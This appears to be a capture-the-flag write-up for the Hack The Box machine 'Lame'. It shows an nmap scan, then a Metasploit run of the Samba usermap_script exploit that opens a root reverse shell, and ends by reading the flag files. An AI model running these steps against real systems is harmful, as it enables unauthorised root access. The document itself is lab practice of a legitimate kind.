root@37f72653a832:/# nmap -sC -sV -T4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-14 22:05 UTC
Nmap scan report for
Host is up (0.15s latency).
Not shown: 996 filtered ports
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3d00h55m17s, deviation: 2h49m43s, median: -3d02h55m18s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-05-11T15:10:24-04:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.12 seconds

Few ports open. My first thought was FTP since it was running the imfamous vsftpd 2.3.4 but it seems the backdoor was patched. Next step was to check out SMB which is running version 3.0.20. Turns out metasploit as an exploit for exactly that version. Using exploit/multi/samba/usermap_script I get a root shell

msf5 exploit(multi/samba/usermap_script) > set rhosts
rhosts =>
msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo yPjA6YJDGlzgt172;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "yPjA6YJDGlzgt172\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2020-05-14 22:20:07 +0000


From here I can read the user.txt and root.txt flags.

cat /home/makis/user.txt
cat /root/root.txt